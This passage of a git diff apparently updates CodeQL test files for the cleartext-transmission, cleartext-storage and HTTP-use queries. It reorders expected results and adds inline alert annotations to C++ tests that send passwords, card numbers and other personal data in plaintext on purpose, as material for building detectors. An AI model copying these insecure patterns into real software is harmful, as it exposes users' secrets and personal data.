salaryString | salaryString | +| test3.cpp:559:3:559:6 | call to send | test3.cpp:556:19:556:30 | salaryString | test3.cpp:559:15:559:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:556:19:556:30 | salaryString | salaryString | +| test3.cpp:572:2:572:5 | call to send | test3.cpp:571:8:571:21 | call to get_home_phone | test3.cpp:572:14:572:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:571:8:571:21 | call to get_home_phone | call to get_home_phone | +| test3.cpp:578:2:578:5 | call to send | test3.cpp:577:8:577:23 | call to get_home_address | test3.cpp:578:14:578:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:577:8:577:23 | call to get_home_address | call to get_home_address | edges | test3.cpp:74:21:74:29 | password1 | test3.cpp:74:21:74:29 | password1 | provenance | | | test3.cpp:74:21:74:29 | password1 | test3.cpp:76:15:76:17 | ptr | provenance | | @@ -140,44 +181,3 @@ nodes | test3.cpp:578:14:578:16 | str | semmle.label | str | subpaths | test3.cpp:138:24:138:32 | password1 | test3.cpp:117:28:117:33 | buffer | test3.cpp:117:13:117:14 | *id | test3.cpp:138:21:138:22 | call to id | -#select -| test3.cpp:22:3:22:6 | call to send | test3.cpp:22:15:22:23 | password1 | test3.cpp:22:15:22:23 | password1 | This operation transmits 'password1', which may contain unencrypted sensitive data from $@. | test3.cpp:22:15:22:23 | password1 | password1 | -| test3.cpp:26:3:26:6 | call to send | test3.cpp:26:15:26:23 | password2 | test3.cpp:26:15:26:23 | password2 | This operation transmits 'password2', which may contain unencrypted sensitive data from $@. | test3.cpp:26:15:26:23 | password2 | password2 | -| test3.cpp:47:3:47:6 | call to recv | test3.cpp:47:15:47:22 | password | test3.cpp:47:15:47:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:47:15:47:22 | password | password | -| test3.cpp:55:3:55:6 | call to recv | test3.cpp:55:15:55:22 | password | test3.cpp:55:15:55:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:55:15:55:22 | password | password | -| test3.cpp:76:3:76:6 | call to send | test3.cpp:74:21:74:29 | password1 | test3.cpp:76:15:76:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:74:21:74:29 | password1 | password1 | -| test3.cpp:83:3:83:6 | call to recv | test3.cpp:81:15:81:22 | password | test3.cpp:83:15:83:17 | ptr | This operation receives into 'ptr', which may put unencrypted sensitive data into $@. | test3.cpp:81:15:81:22 | password | password | -| test3.cpp:101:3:101:6 | call to read | test3.cpp:101:12:101:19 | password | test3.cpp:101:12:101:19 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:101:12:101:19 | password | password | -| test3.cpp:114:2:114:5 | call to recv | test3.cpp:134:11:134:18 | password | test3.cpp:114:14:114:19 | buffer | This operation receives into 'buffer', which may put unencrypted sensitive data into $@. | test3.cpp:134:11:134:18 | password | password | -| test3.cpp:140:3:140:6 | call to send | test3.cpp:138:24:138:32 | password1 | test3.cpp:140:15:140:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:138:24:138:32 | password1 | password1 | -| test3.cpp:146:3:146:6 | call to send | test3.cpp:126:9:126:23 | global_password | test3.cpp:146:15:146:18 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:126:9:126:23 | global_password | global_password | -| test3.cpp:159:3:159:6 | call to send | test3.cpp:157:19:157:26 | password | test3.cpp:159:15:159:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:157:19:157:26 | password | password | -| test3.cpp:228:2:228:5 | call to send | test3.cpp:228:26:228:33 | password | test3.cpp:228:26:228:33 | password | This operation transmits 'password', which may contain unencrypted sensitive data from $@. | test3.cpp:228:26:228:33 | password | password | -| test3.cpp:241:2:241:6 | call to fgets | test3.cpp:241:8:241:15 | password | test3.cpp:241:8:241:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:241:8:241:15 | password | password | -| test3.cpp:272:3:272:6 | call to send | test3.cpp:270:16:270:23 | password | test3.cpp:272:15:272:18 | *data | This operation transmits '*data', which may contain unencrypted sensitive data from $@. | test3.cpp:270:16:270:23 | password | password | -| test3.cpp:290:2:290:5 | call to send | test3.cpp:317:11:317:19 | password1 | test3.cpp:290:14:290:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:317:11:317:19 | password1 | password1 | -| test3.cpp:295:2:295:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:295:14:295:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | -| test3.cpp:300:2:300:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:300:14:300:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | -| test3.cpp:341:4:341:7 | call to recv | test3.cpp:341:16:341:23 | password | test3.cpp:341:16:341:23 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:341:16:341:23 | password | password | -| test3.cpp:388:3:388:6 | call to recv | test3.cpp:388:15:388:22 | password | test3.cpp:388:15:388:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:388:15:388:22 | password | password | -| test3.cpp:414:3:414:6 | call to recv | test3.cpp:414:15:414:24 | password | test3.cpp:414:15:414:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:414:15:414:24 | password | password | -| test3.cpp:420:3:420:6 | call to recv | test3.cpp:420:15:420:24 | password | test3.cpp:420:15:420:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:420:15:420:24 | password | password | -| test3.cpp:431:2:431:6 | call to fgets | test3.cpp:431:8:431:15 | password | test3.cpp:431:8:431:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:431:8:431:15 | password | password | -| test3.cpp:507:2:507:5 | call to send | test3.cpp:507:14:507:39 | social_security_number | test3.cpp:507:14:507:39 | social_security_number | This operation transmits 'social_security_number', which may contain unencrypted sensitive data from $@. | test3.cpp:507:14:507:39 | social_security_number | social_security_number | -| test3.cpp:508:2:508:5 | call to send | test3.cpp:508:14:508:33 | socialSecurityNo | test3.cpp:508:14:508:33 | socialSecurityNo | This operation transmits 'socialSecurityNo', which may contain unencrypted sensitive data from $@. | test3.cpp:508:14:508:33 | socialSecurityNo | socialSecurityNo | -| test3.cpp:509:2:509:5 | call to send | test3.cpp:509:14:509:29 | homePostCode | test3.cpp:509:14:509:29 | homePostCode | This operation transmits 'homePostCode', which may contain unencrypted sensitive data from $@. | test3.cpp:509:14:509:29 | homePostCode | homePostCode | -| test3.cpp:510:2:510:5 | call to send | test3.cpp:510:14:510:28 | my_zip_code | test3.cpp:510:14:510:28 | my_zip_code | This operation transmits 'my_zip_code', which may contain unencrypted sensitive data from $@. | test3.cpp:510:14:510:28 | my_zip_code | my_zip_code | -| test3.cpp:511:2:511:5 | call to send | test3.cpp:511:14:511:26 | telephone | test3.cpp:511:14:511:26 | telephone | This operation transmits 'telephone', which may contain unencrypted sensitive data from $@. | test3.cpp:511:14:511:26 | telephone | telephone | -| test3.cpp:512:2:512:5 | call to send | test3.cpp:512:14:512:36 | mobile_phone_number | test3.cpp:512:14:512:36 | mobile_phone_number | This operation transmits 'mobile_phone_number', which may contain unencrypted sensitive data from $@. | test3.cpp:512:14:512:36 | mobile_phone_number | mobile_phone_number | -| test3.cpp:513:2:513:5 | call to send | test3.cpp:513:14:513:22 | email | test3.cpp:513:14:513:22 | email | This operation transmits 'email', which may contain unencrypted sensitive data from $@. | test3.cpp:513:14:513:22 | email | email | -| test3.cpp:514:2:514:5 | call to send | test3.cpp:514:14:514:38 | my_credit_card_number | test3.cpp:514:14:514:38 | my_credit_card_number | This operation transmits 'my_credit_card_number', which may contain unencrypted sensitive data from $@. | test3.cpp:514:14:514:38 | my_credit_card_number | my_credit_card_number | -| test3.cpp:515:2:515:5 | call to send | test3.cpp:515:14:515:35 | my_bank_account_no | test3.cpp:515:14:515:35 | my_bank_account_no | This operation transmits 'my_bank_account_no', which may contain unencrypted sensitive data from $@. | test3.cpp:515:14:515:35 | my_bank_account_no | my_bank_account_no | -| test3.cpp:516:2:516:5 | call to send | test3.cpp:516:14:516:29 | employerName | test3.cpp:516:14:516:29 | employerName | This operation transmits 'employerName', which may contain unencrypted sensitive data from $@. | test3.cpp:516:14:516:29 | employerName | employerName | -| test3.cpp:517:2:517:5 | call to send | test3.cpp:517:14:517:29 | medical_info | test3.cpp:517:14:517:29 | medical_info | This operation transmits 'medical_info', which may contain unencrypted sensitive data from $@. | test3.cpp:517:14:517:29 | medical_info | medical_info | -| test3.cpp:518:2:518:5 | call to send | test3.cpp:518:14:518:28 | license_key | test3.cpp:518:14:518:28 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | test3.cpp:518:14:518:28 | license_key | license_key | -| test3.cpp:527:3:527:6 | call to send | test3.cpp:526:44:526:54 | my_latitude | test3.cpp:527:15:527:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:526:44:526:54 | my_latitude | my_latitude | -| test3.cpp:533:3:533:6 | call to send | test3.cpp:532:45:532:58 | home_longitude | test3.cpp:533:15:533:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:532:45:532:58 | home_longitude | home_longitude | -| test3.cpp:552:3:552:6 | call to send | test3.cpp:551:47:551:58 | salaryString | test3.cpp:552:15:552:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:551:47:551:58 | salaryString | salaryString | -| test3.cpp:559:3:559:6 | call to send | test3.cpp:556:19:556:30 | salaryString | test3.cpp:559:15:559:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:556:19:556:30 | salaryString | salaryString | -| test3.cpp:572:2:572:5 | call to send | test3.cpp:571:8:571:21 | call to get_home_phone | test3.cpp:572:14:572:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:571:8:571:21 | call to get_home_phone | call to get_home_phone | -| test3.cpp:578:2:578:5 | call to send | test3.cpp:577:8:577:23 | call to get_home_address | test3.cpp:578:14:578:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:577:8:577:23 | call to get_home_address | call to get_home_address | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.qlref index bb3fc66f1f10..5388c41bed6f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-311/CleartextTransmission.ql \ No newline at end of file +query: Security/CWE/CWE-311/CleartextTransmission.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test.cpp index f7be37b6c9f7..e7eecffb4871 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test.cpp @@ -42,7 +42,7 @@ void file() { FILE *file; // BAD: write password to file in cleartext - fputs(thePassword, file); + fputs(thePassword, file); // $ Alert[cpp/cleartext-storage-file] // GOOD: encrypt first char *encrypted = encrypt(thePassword); @@ -50,12 +50,12 @@ void file() { } // test for CleartextBufferWrite -int main(int argc, char** argv) { +int main(int argc, char** argv) { // $ Source[cpp/cleartext-storage-buffer] char *input = argv[2]; char *passwd; // BAD: write password to buffer in cleartext - sprintf(passwd, "%s", input); + sprintf(passwd, "%s", input); // $ Alert[cpp/cleartext-storage-buffer] // GOOD: encrypt first sprintf(passwd, "%s", encrypt(input)); @@ -67,10 +67,10 @@ void stream() { ofstream mystream; // BAD: write password to file in cleartext - mystream << "the password is: " << thePassword; + mystream << "the password is: " << thePassword; // $ Alert[cpp/cleartext-storage-file] Source[cpp/cleartext-storage-file] // BAD: write password to file in cleartext - (mystream << "the password is: ").write(thePassword, strlen(thePassword)); + (mystream << "the password is: ").write(thePassword, strlen(thePassword)); // $ Alert[cpp/cleartext-storage-file] // GOOD: encrypt first char *encrypted = encrypt(thePassword); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test2.cpp index ff10fba761b3..b19118598d4c 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test2.cpp @@ -40,37 +40,37 @@ int getPasswordMaxChars(); void tests(FILE *log, myStruct &s) { - fprintf(log, "password = %s\n", s.password); // BAD - fprintf(log, "thepasswd = %s\n", s.thepasswd); // BAD - fprintf(log, "accountkey = %s\n", s.accountkey); // BAD + fprintf(log, "password = %s\n", s.password); // BAD // $ Alert[cpp/cleartext-storage-file] + fprintf(log, "thepasswd = %s\n", s.thepasswd); // BAD // $ Alert[cpp/cleartext-storage-file] + fprintf(log, "accountkey = %s\n", s.accountkey); // BAD // $ Alert[cpp/cleartext-storage-file] fprintf(log, "password_hash = %s\n", s.password_hash); // GOOD fprintf(log, "encrypted_passwd = %s\n", s.encrypted_passwd); // GOOD fprintf(log, "password_file = %s\n", s.password_file); // GOOD fprintf(log, "password_path = %s\n", s.password_path); // GOOD - fprintf(log, "passwd_config = %s\n", s.passwd_config); // DUBIOUS [REPORTED] + fprintf(log, "passwd_config = %s\n", s.passwd_config); // DUBIOUS [REPORTED] // $ Alert[cpp/cleartext-storage-file] fprintf(log, "num_passwords = %i\n", s.num_passwords); // GOOD fprintf(log, "password_tries = %i\n", *(s.password_tries)); // GOOD fprintf(log, "have_passwd = %i\n", s.have_passwd); // GOOD - fprintf(log, "widepassword = %ls\n", s.widepassword); // BAD - fprintf(log, "widepassword = %S\n", s.widepassword); // BAD + fprintf(log, "widepassword = %ls\n", s.widepassword); // BAD // $ Alert[cpp/cleartext-storage-file] + fprintf(log, "widepassword = %S\n", s.widepassword); // BAD // $ Alert[cpp/cleartext-storage-file] - fprintf(log, "getPassword() = %s\n", getPassword()); // BAD + fprintf(log, "getPassword() = %s\n", getPassword()); // BAD // $ Alert[cpp/cleartext-storage-file] fprintf(log, "getPasswordHash() = %s\n", getPasswordHash()); // GOOD fprintf(log, "getPasswordMaxChars() = %i\n", getPasswordMaxChars()); // GOOD { - char *cpy1 = s.password; + char *cpy1 = s.password; // $ Source[cpp/cleartext-storage-file] char *cpy2 = crypt(s.password); - fprintf(log, "cpy1 = %s\n", cpy1); // BAD + fprintf(log, "cpy1 = %s\n", cpy1); // BAD // $ Alert[cpp/cleartext-storage-file] fprintf(log, "cpy2 = %s\n", cpy2); // GOOD } { char buf[1024]; - strcpy(buf, s.password); - fprintf(log, "buf = %s\n", buf); // BAD + strcpy(buf, s.password); // $ Source[cpp/cleartext-storage-file] + fprintf(log, "buf = %s\n", buf); // BAD // $ Alert[cpp/cleartext-storage-file] strcpy(buf, s.password_hash); fprintf(log, "buf = %s\n", buf); // GOOD @@ -95,8 +95,8 @@ void tests(FILE *log, myStruct &s) { char buffer[1024]; - snprintf(buffer, 1024, "password = %s", s.password); - fprintf(log, "log: %s", buffer); // BAD + snprintf(buffer, 1024, "password = %s", s.password); // $ Source[cpp/cleartext-storage-file] + fprintf(log, "log: %s", buffer); // BAD // $ Alert[cpp/cleartext-storage-file] } } @@ -107,6 +107,6 @@ void test_gets() { char password[1024]; - gets(password); // BAD + gets(password); // BAD // $ Alert[cpp/cleartext-storage-buffer] } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test3.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test3.cpp index 35700d229e75..bd89d8b4d9c0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test3.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test3.cpp @@ -19,11 +19,11 @@ void test_send(const char *password1, const char *password2, const char *passwor { LogonUserA(val(), val(), password1, val(), val(), val()); // proof `password1` is plaintext - send(val(), password1, strlen(password1), val()); // BAD: `password1` is sent plaintext (certainly) + send(val(), password1, strlen(password1), val()); // BAD: `password1` is sent plaintext (certainly) // $ Alert[cpp/cleartext-transmission] } { - send(val(), password2, strlen(password2), val()); // BAD: `password2` is sent plaintext (probably) + send(val(), password2, strlen(password2), val()); // BAD: `password2` is sent plaintext (probably) // $ Alert[cpp/cleartext-transmission] } { @@ -44,7 +44,7 @@ void test_receive() { char password[256]; - recv(val(), password, 256, val()); // BAD: `password` is received plaintext (certainly) + recv(val(), password, 256, val()); // BAD: `password` is received plaintext (certainly) // $ Alert[cpp/cleartext-transmission] LogonUserA(val(), val(), password, val(), val(), val()); // (proof `password` is plaintext) } @@ -52,7 +52,7 @@ void test_receive() { char password[256]; - recv(val(), password, 256, val()); // BAD: `password` is received plaintext (probably) + recv(val(), password, 256, val()); // BAD: `password` is received plaintext (probably) // $ Alert[cpp/cleartext-transmission] } { @@ -71,16 +71,16 @@ void test_receive() void test_dataflow(const char *password1) { { - const char *ptr = password1; + const char *ptr = password1; // $ Source[cpp/cleartext-transmission] - send(val(), ptr, strlen(ptr), val()); // BAD: `password` is sent plaintext + send(val(), ptr, strlen(ptr), val()); // BAD: `password` is sent plaintext // $ Alert[cpp/cleartext-transmission] } { char password[256]; - char *ptr = password; + char *ptr = password; // $ Source[cpp/cleartext-transmission] - recv(val(), ptr, 256, val()); // BAD: `password` is received plaintext + recv(val(), ptr, 256, val()); // BAD: `password` is received plaintext // $ Alert[cpp/cleartext-transmission] } { @@ -98,7 +98,7 @@ void test_read() char password[256]; int fd = val(); - read(fd, password, 256); // BAD: `password` is received plaintext + read(fd, password, 256); // BAD: `password` is received plaintext // $ Alert[cpp/cleartext-transmission] } { @@ -111,7 +111,7 @@ void test_read() void my_recv(char *buffer, size_t bufferSize) { - recv(val(), buffer, bufferSize, val()); + recv(val(), buffer, bufferSize, val()); // $ Alert[cpp/cleartext-transmission] } const char *id(const char *buffer) @@ -123,7 +123,7 @@ char *global_password; char *get_global_str() { - return global_password; + return global_password; // $ Source[cpp/cleartext-transmission] } void test_interprocedural(const char *password1) @@ -131,19 +131,19 @@ void test_interprocedural(const char *password1) { char password[256]; - my_recv(password, 256); // BAD: `password` is received plaintext [detected in `my_recv`] + my_recv(password, 256); // BAD: `password` is received plaintext [detected in `my_recv`] // $ Source[cpp/cleartext-transmission] } { - const char *ptr = id(password1); + const char *ptr = id(password1); // $ Source[cpp/cleartext-transmission] - send(val(), ptr, strlen(ptr), val()); // BAD: `password1` is sent plaintext + send(val(), ptr, strlen(ptr), val()); // BAD: `password1` is sent plaintext // $ Alert[cpp/cleartext-transmission] } { char *data = get_global_str(); - send(val(), data, strlen(data), val()); // BAD: `global_password` is sent plaintext + send(val(), data, strlen(data), val()); // BAD: `global_password` is sent plaintext // $ Alert[cpp/cleartext-transmission] } } @@ -154,9 +154,9 @@ void test_taint(const char *password) { char buffer[16]; - strncpy(buffer, password, 16); + strncpy(buffer, password, 16); // $ Source[cpp/cleartext-transmission] buffer[15] = 0; - send(val(), buffer, 16, val()); // BAD: `password` is (partially) sent plaintext + send(val(), buffer, 16, val()); // BAD: `password` is (partially) sent plaintext // $ Alert[cpp/cleartext-transmission] } } @@ -225,7 +225,7 @@ int get_socket(int from); void test_more_stdio(const char *password) { send(get_socket(1), password, 128, val()); // GOOD: `getsocket(1)` is probably standard output - send(get_socket(val()), password, 128, val()); // BAD + send(get_socket(val()), password, 128, val()); // BAD // $ Alert[cpp/cleartext-transmission] } typedef struct {} FILE; @@ -238,7 +238,7 @@ void test_fgets(FILE *stream) { char password[128]; - fgets(password, 128, stream); // BAD + fgets(password, 128, stream); // BAD // $ Alert[cpp/cleartext-transmission] fgets(password, 128, STDIN_STREAM); // GOOD: `STDIN_STREAM` is probably standard input } @@ -267,9 +267,9 @@ void test_crypt_more() { char data[256], password[256]; - strcpy(data, password); // not proof of anything + strcpy(data, password); // not proof of anything // $ Source[cpp/cleartext-transmission] - send(val(), data, strlen(data), val()); // BAD: password is sent plaintext + send(val(), data, strlen(data), val()); // BAD: password is sent plaintext // $ Alert[cpp/cleartext-transmission] } } @@ -287,17 +287,17 @@ void target2(char *data) void target3(char *data) { - send(val(), data, strlen(data), val()); // BAD: data is a plaintext password + send(val(), data, strlen(data), val()); // BAD: data is a plaintext password // $ Alert[cpp/cleartext-transmission] } void target4(char *data) { - send(val(), data, strlen(data), val()); // BAD: data is a plaintext password + send(val(), data, strlen(data), val()); // BAD: data is a plaintext password // $ Alert[cpp/cleartext-transmission] } void target5(char *data) { - send(val(), data, strlen(data), val()); // BAD: from one source this is a plaintext password + send(val(), data, strlen(data), val()); // BAD: from one source this is a plaintext password // $ Alert[cpp/cleartext-transmission] } void target6(char *data) @@ -314,12 +314,12 @@ void test_multiple_sources_source(char *password1, char *password2) target2(password1); } else { target2(password1); - target3(password1); + target3(password1); // $ Source[cpp/cleartext-transmission] } if (cond()) { - char *data = password2; + char *data = password2; // $ Source[cpp/cleartext-transmission] target4(data); target5(data); @@ -338,7 +338,7 @@ void test_loops() { char password[256]; - recv(val(), password, 256, val()); // BAD: not encrypted + recv(val(), password, 256, val()); // BAD: not encrypted // $ Alert[cpp/cleartext-transmission] // ... } @@ -385,7 +385,7 @@ void test_more_clues() { char password[256]; - recv(val(), password, 256, val()); // BAD: not encrypted + recv(val(), password, 256, val()); // BAD: not encrypted // $ Alert[cpp/cleartext-transmission] } { @@ -411,13 +411,13 @@ void test_member_password() { packet p; - recv(val(), p.password, 256, val()); // BAD: not encrypted + recv(val(), p.password, 256, val()); // BAD: not encrypted // $ Alert[cpp/cleartext-transmission] } { packet p; - recv(val(), p.password, 256, val()); // GOOD: password is encrypted [FALSE POSITIVE] + recv(val(), p.password, 256, val()); // GOOD: password is encrypted [FALSE POSITIVE] // $ Alert[cpp/cleartext-transmission] decrypt_inplace(p.password); // proof that `password` was in fact encrypted } } @@ -428,7 +428,7 @@ void test_stdin_param(FILE *stream) { char password[128]; - fgets(password, 128, stream); // GOOD: from standard input (see call below) [FALSE POSITIVE] + fgets(password, 128, stream); // GOOD: from standard input (see call below) [FALSE POSITIVE] // $ Alert[cpp/cleartext-transmission] } void test_stdin() @@ -504,18 +504,18 @@ struct person_info void tests2(person_info *pi) { // direct cases - send(val(), pi->social_security_number, strlen(pi->social_security_number), val()); // BAD - send(val(), pi->socialSecurityNo, strlen(pi->socialSecurityNo), val()); // BAD - send(val(), pi->homePostCode, strlen(pi->homePostCode), val()); // BAD - send(val(), pi->my_zip_code, strlen(pi->my_zip_code), val()); // BAD - send(val(), pi->telephone, strlen(pi->telephone), val()); // BAD - send(val(), pi->mobile_phone_number, strlen(pi->mobile_phone_number), val()); // BAD - send(val(), pi->email, strlen(pi->email), val()); // BAD - send(val(), pi->my_credit_card_number, strlen(pi->my_credit_card_number), val()); // BAD - send(val(), pi->my_bank_account_no, strlen(pi->my_bank_account_no), val()); // BAD - send(val(), pi->employerName, strlen(pi->employerName), val()); // BAD - send(val(), pi->medical_info, strlen(pi->medical_info), val()); // BAD - send(val(), pi->license_key, strlen(pi->license_key), val()); // BAD + send(val(), pi->social_security_number, strlen(pi->social_security_number), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->socialSecurityNo, strlen(pi->socialSecurityNo), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->homePostCode, strlen(pi->homePostCode), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->my_zip_code, strlen(pi->my_zip_code), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->telephone, strlen(pi->telephone), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->mobile_phone_number, strlen(pi->mobile_phone_number), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->email, strlen(pi->email), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->my_credit_card_number, strlen(pi->my_credit_card_number), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->my_bank_account_no, strlen(pi->my_bank_account_no), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->employerName, strlen(pi->employerName), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->medical_info, strlen(pi->medical_info), val()); // BAD // $ Alert[cpp/cleartext-transmission] + send(val(), pi->license_key, strlen(pi->license_key), val()); // BAD // $ Alert[cpp/cleartext-transmission] send(val(), pi->license_key_hash, strlen(pi->license_key_hash), val()); // GOOD send(val(), pi->my_zip_file, strlen(pi->my_zip_file), val()); // GOOD @@ -523,14 +523,14 @@ void tests2(person_info *pi) { char buffer[1024]; - snprintf(buffer, 1024, "lat = %f\n", pi->my_latitude); - send(val(), buffer, strlen(buffer), val()); // BAD + snprintf(buffer, 1024, "lat = %f\n", pi->my_latitude); // $ Source[cpp/cleartext-transmission] + send(val(), buffer, strlen(buffer), val()); // BAD // $ Alert[cpp/cleartext-transmission] } { char buffer[1024]; - snprintf(buffer, 1024, "long = %f\n", pi->home_longitude); - send(val(), buffer, strlen(buffer), val()); // BAD + snprintf(buffer, 1024, "long = %f\n", pi->home_longitude); // $ Source[cpp/cleartext-transmission] + send(val(), buffer, strlen(buffer), val()); // BAD // $ Alert[cpp/cleartext-transmission] } { char buffer[1024]; @@ -548,15 +548,15 @@ void tests2(person_info *pi) { char buffer[1024]; - snprintf(buffer, 1024, "salary = %s\n", pi->salaryString); - send(val(), buffer, strlen(buffer), val()); // BAD + snprintf(buffer, 1024, "salary = %s\n", pi->salaryString); // $ Source[cpp/cleartext-transmission] + send(val(), buffer, strlen(buffer), val()); // BAD // $ Alert[cpp/cleartext-transmission] } { char buffer[1024]; - char *sal = pi->salaryString; + char *sal = pi->salaryString; // $ Source[cpp/cleartext-transmission] snprintf(buffer, 1024, "salary = %s\n", sal); - send(val(), buffer, strlen(buffer), val()); // BAD + send(val(), buffer, strlen(buffer), val()); // BAD // $ Alert[cpp/cleartext-transmission] } } @@ -568,14 +568,14 @@ void tests3() { const char *str; - str = get_home_phone(); - send(val(), str, strlen(str), val()); // BAD + str = get_home_phone(); // $ Source[cpp/cleartext-transmission] + send(val(), str, strlen(str), val()); // BAD // $ Alert[cpp/cleartext-transmission] str = get_home(); send(val(), str, strlen(str), val()); // GOOD (probably not personal info) - str = get_home_address(); - send(val(), str, strlen(str), val()); // BAD + str = get_home_address(); // $ Source[cpp/cleartext-transmission] + send(val(), str, strlen(str), val()); // BAD // $ Alert[cpp/cleartext-transmission] } int fscanf(FILE* stream, const char* format, ... ); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected index 971cdb4f3ff3..00185bff5faf 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.expected @@ -1,3 +1,10 @@ +#select +| test.cpp:24:21:24:40 | http://example.com | test.cpp:24:21:24:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:28:10:28:29 | http://example.com | test.cpp:28:10:28:29 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:35:23:35:42 | http://example.com | test.cpp:35:23:35:42 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:36:26:36:45 | http://example.com | test.cpp:36:26:36:45 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:46:18:46:26 | http:// | test.cpp:46:18:46:26 | *http:// | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | +| test.cpp:110:21:110:40 | http://example.com | test.cpp:110:21:110:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | edges | test.cpp:11:26:11:28 | *url | test.cpp:15:30:15:32 | *url | provenance | | | test.cpp:24:13:24:17 | **url_g | test.cpp:38:11:38:15 | *url_g | provenance | | @@ -41,10 +48,3 @@ nodes | test.cpp:116:3:116:37 | *... = ... | semmle.label | *... = ... | | test.cpp:121:11:121:13 | *ptr | semmle.label | *ptr | subpaths -#select -| test.cpp:24:21:24:40 | http://example.com | test.cpp:24:21:24:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:28:10:28:29 | http://example.com | test.cpp:28:10:28:29 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:35:23:35:42 | http://example.com | test.cpp:35:23:35:42 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:36:26:36:45 | http://example.com | test.cpp:36:26:36:45 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:46:18:46:26 | http:// | 